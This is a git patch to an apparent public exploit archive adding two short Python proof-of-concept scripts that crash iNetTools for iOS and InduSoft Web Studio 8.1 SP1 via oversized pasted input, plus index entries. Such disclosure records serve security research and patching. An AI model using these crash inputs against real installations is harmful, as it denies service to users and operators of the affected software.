From 5543ae6e2e1dad00d0e6cd72ba1bad4ba11792e6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 27 Nov 2019 05:01:43 +0000 Subject: [PATCH] DB: 2019-11-27 2 changes to exploits/shellcodes iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC) InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC) --- exploits/ios/dos/47716.py | 25 +++++++++++++++++++++++++ exploits/windows/dos/47717.py | 33 +++++++++++++++++++++++++++++++++ files_exploits.csv | 2 ++ 3 files changed, 60 insertions(+) create mode 100755 exploits/ios/dos/47716.py create mode 100755 exploits/windows/dos/47717.py diff --git a/exploits/ios/dos/47716.py b/exploits/ios/dos/47716.py new file mode 100755 index 000000000..f55a313f0 --- /dev/null +++ b/exploits/ios/dos/47716.py @@ -0,0 +1,25 @@ +# Exploit Title: iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC) +# Discovery by: Ivan Marmolejo +# Discovery Date: 2019-11-25 +# Vendor Homepage: https://apps.apple.com/mx/app/inettools-ping-dns-port-scan/id561659975 +# Software Link: App Store for iOS devices +# Tested Version: 8.20 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 6s iOS 13.2 + +# Summary: iNetTools is a suite of network diagnose tools on iPhone and iPad. It provides essential tools such as +# Ping, DNS Lookup, Trace Route, Port Scan, Whois, Server Monitor, and Lan Scan. +# Steps to Produce the Crash: + +# 1.- Run python code: iNetTools.py +# 2.- Copy content to clipboard +# 3.- Open "iNetTools for iOS" +# 4.- Go to "Whois" +# 5.- Paste ClipBoard on "Domain Name" +# 6.- Start +# 7.- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 98 +print (buffer) \ No newline at end of file diff --git a/exploits/windows/dos/47717.py b/exploits/windows/dos/47717.py new file mode 100755 index 000000000..7eed53148 --- /dev/null +++ b/exploits/windows/dos/47717.py @@ -0,0 +1,33 @@ +# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" Denial of Service (PoC) +# Discovery by: chuyreds +# Discovery Date: 2019-11-23 +# Vendor Homepage: http://www.indusoft.com/ +# Software Link : http://www.indusoft.com/Products-Downloads +# Tested Version: 8.1 SP1 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Exploit Title: InduSoft Web Studio 8.1 SP1 - "Atributos" 'No Redibujar'/'Deshabilitados' Denial of Service (PoC) +# Discovery by: chuyreds +# Google Dork: chuyrojas1997@gmail.com: chuyreds +# Discovery Date: 23-11-2019 +# Vendor Homepage: http://www.indusoft.com/ +# Software Link : http://www.indusoft.com/Products-Downloads +# Tested Version: 8.1 SP1 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: Windows 10 Pro x64 es + +# Steps to Produce the Denial of Service: +# 1.- Run python code: InduSoft Web Studio Edition 8.1 SP1.py +# 2.- Open InduSoft "Web Studio Edition 8.1 SP1.txt" and copy content to clipboard +# 3.- Open InduSoft Web Studio Edition 8.1 SP1 +# 4.- On Graficos slect Atributos +# 5.- Paste ClipBoard on "No Redibujar"/"Deshabilitados" and click on "Aceptar" + + +#!/usr/bin/env python + +buffer = "\x41" * 1026 +f = open ("InduSoft Web Studio Edition 8.1 SP1.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index d8d22421f..612098bb4 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6607,6 +6607,8 @@ id,file,description,date,author,type,platform,port 47707,exploits/windows/dos/47707.txt,"Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback",2019-11-22,"Google Security Research",dos,windows, 47709,exploits/windows/dos/47709.py,"SMPlayer 19.5.0 - Denial of Service (PoC)",2019-11-25,"Malav Vyas",dos,windows, 47711,exploits/windows/dos/47711.py,"InTouch Machine Edition 8.1 SP1 - 'Atributos' Denial of Service (PoC)",2019-11-25,chuyreds,dos,windows, +47716,exploits/ios/dos/47716.py,"iNetTools for iOS 8.20 - 'Whois' Denial of Service (PoC)",2019-11-26,"Ivan Marmolejo",dos,ios, +47717,exploits/windows/dos/47717.py,"InduSoft Web Studio 8.1 SP1 - _Atributos_ Denial of Service (PoC)",2019-11-26,chuyreds,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,